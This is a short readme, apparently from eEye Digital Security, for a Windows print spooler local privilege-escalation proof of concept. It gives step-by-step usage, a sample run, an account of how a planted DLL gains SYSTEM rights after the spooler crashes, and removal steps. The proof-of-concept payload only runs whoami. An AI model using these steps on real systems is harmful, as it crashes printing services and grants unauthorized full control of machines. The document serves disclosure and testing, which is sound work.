Whooo. Amazing that someone actually read the readme.txt heh.

---> Hack Me Up

1. Unzip spoolsploit.zip to a temp directory.
2. Copy whoami.exe to c:\temp
3. Type 'spoolsploit spoolhack.dll add' in the directory where you extracted the files.
You should see something like the following:
C:\hack\audit\exploits\local>spoolsploit spoolhack.dll add
Spoolss.exe exploit.
Marc@eEye.com
http://www.eEye.com
Waste: copy spoolhack.dll c:\winnt\system32
        1 file(s) copied.
Exploit Success.

At this point the spooler service should have been crashed and therefore when someone tries to print on the system they will get an error and the administrator will have to restart the spooler service. Upon the spooler service being restarted the spoolhack.dll is loaded and executed. Since the spooler service runs as SYSTEM the dll's code is executed as SYSTEM therefore giving you full control of the local machine.

The current exploit dll just executes whoami.exe and pipes the output to c:\temp\eeyerulez.txt to show that we executed as SYSTEM.

Note: This example exploit will not work if your winnt directory is not c:\winnt. So if that is the case you will need to tweak the code to make it work.

---> Removing the hack dll

Delete c:\winnt\system32\spoolhack.dll
Delete the registry key: HKYLM\SYSTEM\ControlSet001\Print\Providers\spoolhack.dll
Restart the spooler service and everything should be back to being peachy.

Signed,
Marc
Marc@eEye.com
eEye Digital Security Team
http://www.eEye.com